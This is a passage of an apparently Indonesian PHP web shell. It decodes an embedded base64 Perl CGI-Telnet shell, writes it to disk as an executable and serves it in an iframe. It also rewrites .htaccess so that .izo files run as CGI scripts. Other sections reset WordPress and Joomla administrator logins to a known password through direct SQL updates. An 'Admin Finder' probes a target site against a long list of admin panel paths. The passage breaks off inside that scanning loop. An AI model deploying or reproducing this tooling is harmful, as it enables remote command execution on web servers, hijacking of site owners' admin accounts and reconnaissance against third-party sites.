$cgi2012 = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCnVzZSBNSU1FOjpCYXNlNjQ7CiRWZXJzaW9uPSAiQ0dJLVRlbG5ldCBWZXJzaW9uIDEuMyI7CiRFZGl0UGVyc2lvbj0iPGZvbnQgc3R5bGU9J3RleHQtc2hhZG93OiAwcHggMHB4IDZweCByZ2IoMjU1LCAwLCAwKSwgMHB4IDBweCA1cHggcmdiKDMwMCwgMCwgMCksIDBweCAwcHggNXB4IHJnYigzMDAsIDAsIDApOyBjb2xvcjojZmZmZmZmOyBmb250LXdlaWdodDpib2xkOyc+YjM3NGsgLSBDR0ktVGVsbmV0PC9mb250PiI7CgokUGFzc3dvcmQgPSAiYmFuZHVuZ2tvdGFzYW1wYWgiOwkJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4Kc3ViIElzX1dpbigpewoJJG9zID0gJnRyaW0oJEVOVnsiU0VSVkVSX1NPRlRXQVJFIn0pOwoJaWYoJG9zID1+IG0vd2luL2kpewoJCXJldHVybiAxOwoJfQoJZWxzZXsKCQlyZXR1cm4gMDsKCX0KfQokV2luTlQgPSAmSXNfV2luKCk7CQkJCSMgWW91IG5lZWQgdG8gY2hhbmdlIHRoZSB2YWx1ZSBvZiB0aGlzIHRvIDEgaWYKCQkJCQkJCQkjIHlvdSdyZSBydW5uaW5nIHRoaXMgc2NyaXB0IG9uIGEgV2luZG93cyBOVAoJCQkJCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkJCQkJIyBjYW4gbGVhdmUgdGhlIHZhbHVlIGFzIGl0IGlzLgoKJE5UQ21kU2VwID0gIiYiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gV2luZG93cyBOVC4KCiRVbml4Q21kU2VwID0gIjsiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gVW5peC4KCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTAwMDA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkCgkJCQkJCQkJIyBEb24ndCBzZXQgdGhpcyB0byBhIHZlcnkgbGFyZ2UgdmFsdWUuIFRoaXMgaXMKCQkJCQkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLgoJCQkJCQkJCSMgVGhpcyBpcyB2YWxpZCBvbmx5IG9uIFVuaXggc2VydmVycy4gSXQgaXMKCQkJCQkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkJIyBJZiB0aGlzIGlzIDEsIHRoZW4gZGF0YSBpcyBzZW50IHRvIHRoZQoJCQkJCQkJCSMgYnJvd3NlciBhcyBzb29uIGFzIGl0IGlzIG91dHB1dCwgb3RoZXJ3aXNlCgkJCQkJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkJCQkJIyBjb21wbGV0ZXMuIFRoaXMgaXMgdXNlZnVsIGZvciBjb21tYW5kcyBsaWtlCgkJCQkJCQkJIyBwaW5nLCBzbyB0aGF0IHlvdSBjYW4gc2VlIHRoZSBvdXRwdXQgYXMgaXQKCQkJCQkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwokY29scz0gMTUwOwokcm93cz0gMjY7CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBSZWFkcyB0aGUgaW5wdXQgc2VudCBieSB0aGUgYnJvd3NlciBhbmQgcGFyc2VzIHRoZSBpbnB1dCB2YXJpYWJsZXMuIEl0CiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlwYXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4KIyBUaGUgZmlsZW5hbWUgaXMgc3RvcmVkIGluICRpbnsnZid9IGFuZCB0aGUgZGF0YSBpcyBzdG9yZWQgaW4gJGlueydmaWxlZGF0YSd9LgojIE90aGVyIHZhcmlhYmxlcyBjYW4gYmUgYWNjZXNzZWQgdXNpbmcgJGlueyd2YXInfSwgd2hlcmUgdmFyIGlzIHRoZSBuYW1lIG9mCiMgdGhlIHZhcmlhYmxlLiBOb3RlOiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBDR0kKIyBzY3JpcHRzLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBSZWFkUGFyc2UgCnsKCWxvY2FsICgqaW4pID0gQF8gaWYgQF87Cglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOwoJCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsKCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQoJewoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9OwoJfQoJZWxzaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpCgl7CgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOwoJCXJlYWQoU1RESU4sICRpbiwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7Cgl9CgoJIyBoYW5kbGUgZmlsZSB1cGxvYWQgZGF0YQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pCgl7CgkJJEJvdW5kYXJ5ID0gJy0tJy4kMTsgIyBwbGVhc2UgcmVmZXIgdG8gUkZDMTg2NyAKCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyAKCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOwoJCSRIZWFkZXJCb2R5ID1+IC9cclxuXHJcbnxcblxuLzsKCQkkSGVhZGVyID0gJGA7CgkJJEJvZHkgPSAkJzsKIAkJJEJvZHkgPX4gcy9cclxuJC8vOyAjIHR
|
||
|
|
||
|
$file = fopen("cgi2012.izo" ,"w+");
|
||
|
$write = fwrite ($file ,base64_decode($cgi2012));
|
||
|
fclose($file);
|
||
|
chmod("cgi2012.izo",0755);
|
||
|
echo " <iframe src=cgi2012/cgi2012.izo width=96% height=76% frameborder=0></iframe>
|
||
|
|
||
|
</div>"; }
|
||
|
|
||
|
///////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'config'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=config" method="post">
|
||
|
|
||
|
<?php
|
||
|
|
||
|
echo "<center/><br/><b><font color=#00ff00>+--==[ Config Shell Priv8 SCR ]==--+</font></b><br><br>";
|
||
|
|
||
|
mkdir('config', 0755);
|
||
|
chdir('config');
|
||
|
$kokdosya = ".htaccess";
|
||
|
$dosya_adi = "$kokdosya";
|
||
|
$dosya = fopen ($dosya_adi , 'w') or die ("Error cuyy!");
|
||
|
$metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
|
||
|
|
||
|
AddType application/x-httpd-cgi .cpc
|
||
|
|
||
|
AddHandler cgi-script .izo
|
||
|
AddHandler cgi-script .izo";
|
||
|
fwrite ( $dosya , $metin ) ;
|
||
|
fclose ($dosya);
|
||
|
|
||
|
$file = fopen("config.izo" ,"w+");
|
||
|
$write = fwrite ($file ,base64_decode($configshell));
|
||
|
fclose($file);
|
||
|
chmod("config.izo",0755);
|
||
|
echo "<iframe src=config/config.izo width=97% height=100% frameborder=0></iframe>
|
||
|
</div>";
|
||
|
}
|
||
|
/////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
|
||
|
///////////////////////////////////////////////////////////////////////////
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'wp-reset'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=wp-reset" method="post">
|
||
|
|
||
|
<?php
|
||
|
|
||
|
echo "<center/><br/><b><font color=#00ff00>+--==[ Wordpress Reset Password ]==--+</font></b><br><br>";
|
||
|
|
||
|
if(empty($_POST['pwd'])){
|
||
|
|
||
|
echo "<FORM method='POST'>
|
||
|
<table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td> Hostname</td><td>
|
||
|
<input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td> Database</td><td>
|
||
|
<input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td> username</td><td>
|
||
|
<input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td> password</td><td>
|
||
|
<input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
|
||
|
<tr><td> User baru</td><td>
|
||
|
<input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
|
||
|
<tr><td> Pass Baru</td><td>
|
||
|
<input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />
|
||
|
|
||
|
<input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
|
||
|
</td></tr> </table><br><br><br><br>
|
||
|
";
|
||
|
}else{
|
||
|
$localhost = $_POST['localhost'];
|
||
|
$database = $_POST['database'];
|
||
|
$username = $_POST['username'];
|
||
|
$password = $_POST['password'];
|
||
|
$pwd = $_POST['pwd'];
|
||
|
$admin = $_POST['admin'];
|
||
|
|
||
|
|
||
|
@mysql_connect($localhost,$username,$password) or die(mysql_error());
|
||
|
@mysql_select_db($database) or die(mysql_error());
|
||
|
|
||
|
$hash = crypt($pwd);
|
||
|
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
|
||
|
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
|
||
|
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
|
||
|
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
|
||
|
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
|
||
|
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
|
||
|
$a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
|
||
|
|
||
|
|
||
|
if($a4s){
|
||
|
echo "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
|
||
|
echo "
|
||
|
</div>"; }
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'jm-reset'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=jm-reset" method="post">
|
||
|
|
||
|
<?php
|
||
|
|
||
|
echo "<center/><br/><b><font color=#00ff00>+--==[ Joomla Reset Password ]==--+</font></b><br><br>";
|
||
|
if(empty($_POST['pwd'])){
|
||
|
echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td> Host</td><td>
|
||
|
<input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td> Database</td><td>
|
||
|
<input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr> <tr><td> username</td><td>
|
||
|
<input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr> <tr><td> password</td><td>
|
||
|
<input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
|
||
|
<tr><td> User baru</td><td>
|
||
|
<input style='width:270px;' class='inputz' name='admin' value='admin' /></td></tr>
|
||
|
<tr><td> pass baru </td><td>123456 =
|
||
|
<input style='width:130px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />
|
||
|
|
||
|
<input style='width:23%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
|
||
|
</td></tr> </table><br><br><br><br>
|
||
|
";
|
||
|
}else{
|
||
|
$localhost = $_POST['localhost'];
|
||
|
$database = $_POST['database'];
|
||
|
$username = $_POST['username'];
|
||
|
$password = $_POST['password'];
|
||
|
$pwd = $_POST['pwd'];
|
||
|
$admin = $_POST['admin'];
|
||
|
@mysql_connect($localhost,$username,$password) or die(mysql_error());
|
||
|
@mysql_select_db($database) or die(mysql_error());
|
||
|
$hash = crypt($pwd);
|
||
|
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
|
||
|
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
|
||
|
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
|
||
|
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
|
||
|
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
|
||
|
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
|
||
|
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
|
||
|
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
|
||
|
if($SQL){
|
||
|
echo "<b>Success : skarang password barunya >>> - (123456)";
|
||
|
}
|
||
|
}
|
||
|
|
||
|
echo "
|
||
|
</div>";
|
||
|
}
|
||
|
//////////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'adfin'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=adfin" method="post">
|
||
|
|
||
|
<?php
|
||
|
set_time_limit(0);
|
||
|
error_reporting(0);
|
||
|
$list['front'] ="admin
|
||
|
adm
|
||
|
admincp
|
||
|
admcp
|
||
|
cp
|
||
|
modcp
|
||
|
moderatorcp
|
||
|
adminare
|
||
|
admins
|
||
|
cpanel
|
||
|
controlpanel";
|
||
|
$list['end'] = "admin1.php
|
||
|
admin1.html
|
||
|
admin2.php
|
||
|
admin2.html
|
||
|
yonetim.php
|
||
|
yonetim.html
|
||
|
yonetici.php
|
||
|
yonetici.html
|
||
|
ccms/
|
||
|
ccms/login.php
|
||
|
ccms/index.php
|
||
|
maintenance/
|
||
|
webmaster/
|
||
|
adm/
|
||
|
configuration/
|
||
|
configure/
|
||
|
websvn/
|
||
|
admin/
|
||
|
admin/account.php
|
||
|
admin/account.html
|
||
|
admin/index.php
|
||
|
admin/index.html
|
||
|
admin/login.php
|
||
|
admin/login.html
|
||
|
admin/home.php
|
||
|
admin/controlpanel.html
|
||
|
admin/controlpanel.php
|
||
|
admin.php
|
||
|
admin.html
|
||
|
admin/cp.php
|
||
|
admin/cp.html
|
||
|
cp.php
|
||
|
cp.html
|
||
|
administrator/
|
||
|
administrator/index.html
|
||
|
administrator/index.php
|
||
|
administrator/login.html
|
||
|
administrator/login.php
|
||
|
administrator/account.html
|
||
|
administrator/account.php
|
||
|
administrator.php
|
||
|
administrator.html
|
||
|
login.php
|
||
|
login.html
|
||
|
modelsearch/login.php
|
||
|
moderator.php
|
||
|
moderator.html
|
||
|
moderator/login.php
|
||
|
moderator/login.html
|
||
|
moderator/admin.php
|
||
|
moderator/admin.html
|
||
|
moderator/
|
||
|
account.php
|
||
|
account.html
|
||
|
controlpanel/
|
||
|
controlpanel.php
|
||
|
controlpanel.html
|
||
|
admincontrol.php
|
||
|
admincontrol.html
|
||
|
adminpanel.php
|
||
|
adminpanel.html
|
||
|
admin1.asp
|
||
|
admin2.asp
|
||
|
yonetim.asp
|
||
|
yonetici.asp
|
||
|
admin/account.asp
|
||
|
admin/index.asp
|
||
|
admin/login.asp
|
||
|
admin/home.asp
|
||
|
admin/controlpanel.asp
|
||
|
admin.asp
|
||
|
admin/cp.asp
|
||
|
cp.asp
|
||
|
administrator/index.asp
|
||
|
administrator/login.asp
|
||
|
administrator/account.asp
|
||
|
administrator.asp
|
||
|
login.asp
|
||
|
modelsearch/login.asp
|
||
|
moderator.asp
|
||
|
moderator/login.asp
|
||
|
moderator/admin.asp
|
||
|
account.asp
|
||
|
controlpanel.asp
|
||
|
admincontrol.asp
|
||
|
adminpanel.asp
|
||
|
fileadmin/
|
||
|
fileadmin.php
|
||
|
fileadmin.asp
|
||
|
fileadmin.html
|
||
|
administration/
|
||
|
administration.php
|
||
|
administration.html
|
||
|
sysadmin.php
|
||
|
sysadmin.html
|
||
|
phpmyadmin/
|
||
|
myadmin/
|
||
|
sysadmin.asp
|
||
|
sysadmin/
|
||
|
ur-admin.asp
|
||
|
ur-admin.php
|
||
|
ur-admin.html
|
||
|
ur-admin/
|
||
|
Server.php
|
||
|
Server.html
|
||
|
Server.asp
|
||
|
Server/
|
||
|
wp-admin/
|
||
|
administr8.php
|
||
|
administr8.html
|
||
|
administr8/
|
||
|
administr8.asp
|
||
|
webadmin/
|
||
|
webadmin.php
|
||
|
webadmin.asp
|
||
|
webadmin.html
|
||
|
administratie/
|
||
|
admins/
|
||
|
admins.php
|
||
|
admins.asp
|
||
|
admins.html
|
||
|
administrivia/
|
||
|
Database_Administration/
|
||
|
WebAdmin/
|
||
|
useradmin/
|
||
|
sysadmins/
|
||
|
admin1/
|
||
|
system-administration/
|
||
|
administrators/
|
||
|
pgadmin/
|
||
|
directadmin/
|
||
|
staradmin/
|
||
|
ServerAdministrator/
|
||
|
SysAdmin/
|
||
|
administer/
|
||
|
LiveUser_Admin/
|
||
|
sys-admin/
|
||
|
typo3/
|
||
|
panel/
|
||
|
cpanel/
|
||
|
cPanel/
|
||
|
cpanel_file/
|
||
|
platz_login/
|
||
|
rcLogin/
|
||
|
blogindex/
|
||
|
formslogin/
|
||
|
autologin/
|
||
|
support_login/
|
||
|
meta_login/
|
||
|
manuallogin/
|
||
|
simpleLogin/
|
||
|
loginflat/
|
||
|
utility_login/
|
||
|
showlogin/
|
||
|
memlogin/
|
||
|
members/
|
||
|
login-redirect/
|
||
|
sub-login/
|
||
|
wp-login/
|
||
|
login1/
|
||
|
dir-login/
|
||
|
login_db/
|
||
|
xlogin/
|
||
|
smblogin/
|
||
|
customer_login/
|
||
|
UserLogin/
|
||
|
login-us/
|
||
|
acct_login/
|
||
|
admin_area/
|
||
|
bigadmin/
|
||
|
project-admins/
|
||
|
phppgadmin/
|
||
|
pureadmin/
|
||
|
sql-admin/
|
||
|
radmind/
|
||
|
openvpnadmin/
|
||
|
wizmysqladmin/
|
||
|
vadmind/
|
||
|
ezsqliteadmin/
|
||
|
hpwebjetadmin/
|
||
|
newsadmin/
|
||
|
adminpro/
|
||
|
Lotus_Domino_Admin/
|
||
|
bbadmin/
|
||
|
vmailadmin/
|
||
|
Indy_admin/
|
||
|
ccp14admin/
|
||
|
irc-macadmin/
|
||
|
banneradmin/
|
||
|
sshadmin/
|
||
|
phpldapadmin/
|
||
|
macadmin/
|
||
|
administratoraccounts/
|
||
|
admin4_account/
|
||
|
admin4_colon/
|
||
|
radmind-1/
|
||
|
Super-Admin/
|
||
|
AdminTools/
|
||
|
cmsadmin/
|
||
|
SysAdmin2/
|
||
|
globes_admin/
|
||
|
cadmins/
|
||
|
phpSQLiteAdmin/
|
||
|
navSiteAdmin/
|
||
|
server_admin_small/
|
||
|
logo_sysadmin/
|
||
|
server/
|
||
|
database_administration/
|
||
|
power_user/
|
||
|
system_administration/
|
||
|
ss_vms_admin_sm/
|
||
|
adminarea/
|
||
|
bb-admin/
|
||
|
adminLogin/
|
||
|
panel-administracion/
|
||
|
instadmin/
|
||
|
memberadmin/
|
||
|
administratorlogin/
|
||
|
admin/admin.php
|
||
|
admin_area/admin.php
|
||
|
admin_area/login.php
|
||
|
siteadmin/login.php
|
||
|
siteadmin/index.php
|
||
|
siteadmin/login.html
|
||
|
admin/admin.html
|
||
|
admin_area/index.php
|
||
|
bb-admin/index.php
|
||
|
bb-admin/login.php
|
||
|
bb-admin/admin.php
|
||
|
admin_area/login.html
|
||
|
admin_area/index.html
|
||
|
admincp/index.asp
|
||
|
admincp/login.asp
|
||
|
admincp/index.html
|
||
|
webadmin/index.html
|
||
|
webadmin/admin.html
|
||
|
webadmin/login.html
|
||
|
admin/admin_login.html
|
||
|
admin_login.html
|
||
|
panel-administracion/login.html
|
||
|
nsw/admin/login.php
|
||
|
webadmin/login.php
|
||
|
admin/admin_login.php
|
||
|
admin_login.php
|
||
|
admin_area/admin.html
|
||
|
pages/admin/admin-login.php
|
||
|
admin/admin-login.php
|
||
|
admin-login.php
|
||
|
bb-admin/index.html
|
||
|
bb-admin/login.html
|
||
|
bb-admin/admin.html
|
||
|
admin/home.html
|
||
|
pages/admin/admin-login.html
|
||
|
admin/admin-login.html
|
||
|
admin-login.html
|
||
|
admin/adminLogin.html
|
||
|
adminLogin.html
|
||
|
home.html
|
||
|
rcjakar/admin/login.php
|
||
|
adminarea/index.html
|
||
|
adminarea/admin.html
|
||
|
webadmin/index.php
|
||
|
webadmin/admin.php
|
||
|
user.html
|
||
|
modelsearch/login.html
|
||
|
adminarea/login.html
|
||
|
panel-administracion/index.html
|
||
|
panel-administracion/admin.html
|
||
|
modelsearch/index.html
|
||
|
modelsearch/admin.html
|
||
|
admincontrol/login.html
|
||
|
adm/index.html
|
||
|
adm.html
|
||
|
user.php
|
||
|
panel-administracion/login.php
|
||
|
wp-login.php
|
||
|
adminLogin.php
|
||
|
admin/adminLogin.php
|
||
|
home.php
|
||
|
adminarea/index.php
|
||
|
adminarea/admin.php
|
||
|
adminarea/login.php
|
||
|
panel-administracion/index.php
|
||
|
panel-administracion/admin.php
|
||
|
modelsearch/index.php
|
||
|
modelsearch/admin.php
|
||
|
admincontrol/login.php
|
||
|
adm/admloginuser.php
|
||
|
admloginuser.php
|
||
|
admin2/login.php
|
||
|
admin2/index.php
|
||
|
adm/index.php
|
||
|
adm.php
|
||
|
affiliate.php
|
||
|
adm_auth.php
|
||
|
memberadmin.php
|
||
|
administratorlogin.php
|
||
|
admin/admin.asp
|
||
|
admin_area/admin.asp
|
||
|
admin_area/login.asp
|
||
|
admin_area/index.asp
|
||
|
bb-admin/index.asp
|
||
|
bb-admin/login.asp
|
||
|
bb-admin/admin.asp
|
||
|
pages/admin/admin-login.asp
|
||
|
admin/admin-login.asp
|
||
|
admin-login.asp
|
||
|
user.asp
|
||
|
webadmin/index.asp
|
||
|
webadmin/admin.asp
|
||
|
webadmin/login.asp
|
||
|
admin/admin_login.asp
|
||
|
admin_login.asp
|
||
|
panel-administracion/login.asp
|
||
|
adminLogin.asp
|
||
|
admin/adminLogin.asp
|
||
|
home.asp
|
||
|
adminarea/index.asp
|
||
|
adminarea/admin.asp
|
||
|
adminarea/login.asp
|
||
|
panel-administracion/index.asp
|
||
|
panel-administracion/admin.asp
|
||
|
modelsearch/index.asp
|
||
|
modelsearch/admin.asp
|
||
|
admincontrol/login.asp
|
||
|
adm/admloginuser.asp
|
||
|
admloginuser.asp
|
||
|
admin2/login.asp
|
||
|
admin2/index.asp
|
||
|
adm/index.asp
|
||
|
adm.asp
|
||
|
affiliate.asp
|
||
|
adm_auth.asp
|
||
|
memberadmin.asp
|
||
|
administratorlogin.asp
|
||
|
siteadmin/login.asp
|
||
|
siteadmin/index.asp
|
||
|
ADMIN/
|
||
|
paneldecontrol/
|
||
|
login/
|
||
|
cms/
|
||
|
admon/
|
||
|
ADMON/
|
||
|
administrador/
|
||
|
ADMIN/login.php
|
||
|
panelc/
|
||
|
ADMIN/login.html";
|
||
|
function template() {
|
||
|
echo '
|
||
|
|
||
|
<script type="text/javascript">
|
||
|
<!--
|
||
|
function insertcode($text, $place, $replace)
|
||
|
{
|
||
|
var $this = $text;
|
||
|
var logbox = document.getElementById($place);
|
||
|
if($replace == 0)
|
||
|
document.getElementById($place).innerHTML = logbox.innerHTML+$this;
|
||
|
else
|
||
|
document.getElementById($place).innerHTML = $this;
|
||
|
//document.getElementById("helpbox").innerHTML = $this;
|
||
|
}
|
||
|
-->
|
||
|
</script>
|
||
|
<br>
|
||
|
<br>
|
||
|
<h1 class="technique-two">
|
||
|
|
||
|
|
||
|
|
||
|
</h1>
|
||
|
|
||
|
<div class="wrapper">
|
||
|
<div class="red">
|
||
|
<div class="tube">
|
||
|
<center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
|
||
|
<form action="" method="post" name="xploit_form">
|
||
|
|
||
|
<tr>
|
||
|
<tr>
|
||
|
<b><td>URL</td>
|
||
|
<td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
|
||
|
</td>
|
||
|
</tr><tr>
|
||
|
<td>404 string</td>
|
||
|
<td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
|
||
|
</td></b>
|
||
|
</tr><br><td>
|
||
|
<span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
|
||
|
</span></td></tr>
|
||
|
</form></td></tr>
|
||
|
<br /></table>
|
||
|
</div> <!-- /tube -->
|
||
|
</div> <!-- /red -->
|
||
|
<br />
|
||
|
<div class="green">
|
||
|
<div class="tube" id="rightcol">
|
||
|
Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
|
||
|
<b>Found ones:<br /></b>
|
||
|
</div> <!-- /tube -->
|
||
|
</div></center><!-- /green -->
|
||
|
<br clear="all" /><br />
|
||
|
<div class="blue">
|
||
|
<div class="tube" id="logbox">
|
||
|
<br />
|
||
|
<br />
|
||
|
Admin page Finder :<br /><br />
|
||
|
</div> <!-- /tube -->
|
||
|
</div> <!-- /blue -->
|
||
|
</div> <!-- /wrapper -->
|
||
|
<br clear="all"><br>';
|
||
|
}
|
||
|
function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
|
||
|
if($br == 1) $msg .= "<br />";
|
||
|
echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
|
||
|
if($stop == 1) exit;
|
||
|
@flush();@ob_flush();
|
||
|
}
|
||
|
function check($x, $front=0) {
|
||
|
global $_POST,$site,$false;
|
||
|
if($front == 0) $t = $site.$x;
|
||
|
else $t = 'http://'.$x.'.'.$site.'/';
|
||
|
$headers = get_headers($t);
|
||
|
if (!eregi('200', $headers[0])) return 0;
|
||
|
$data = @file_get_contents($t);
|
||
|
if($_POST['xploit_404string'] == "") if($data == $false) return 0;
|
||
|
if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
|
||
|
return 1;
|
||
|
}
|
||
|
|
||
|
// --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
template();
|
||
|
if(!isset($_POST['xploit_url'])) die;
|
||
|
if($_POST['xploit_url'] == '') die;
|
||
|
$site = $_POST['xploit_url'];
|
||
|
if ($site[strlen($site)-1] != "/") $site .= "/";
|
||
|
if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
|
||
|
$list['end'] = str_replace("\r", "", $list['end']);
|
||
|
$list['front'] = str_replace("\r", "", $list['front']);
|
||
|
$pathes = explode("\n", $list['end']);
|
||
|
$frontpathes = explode("\n", $list['front']);
|
||
|
show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
|
||
|
$verificate = 0;
|
||
|
foreach($pathes as $path) {
|
||
|
show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
|
||
|
$verificate++; show($verificate, 0, 0, 'verified', 1);
|
||
|
if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
|
||
|
else{
|
||
|
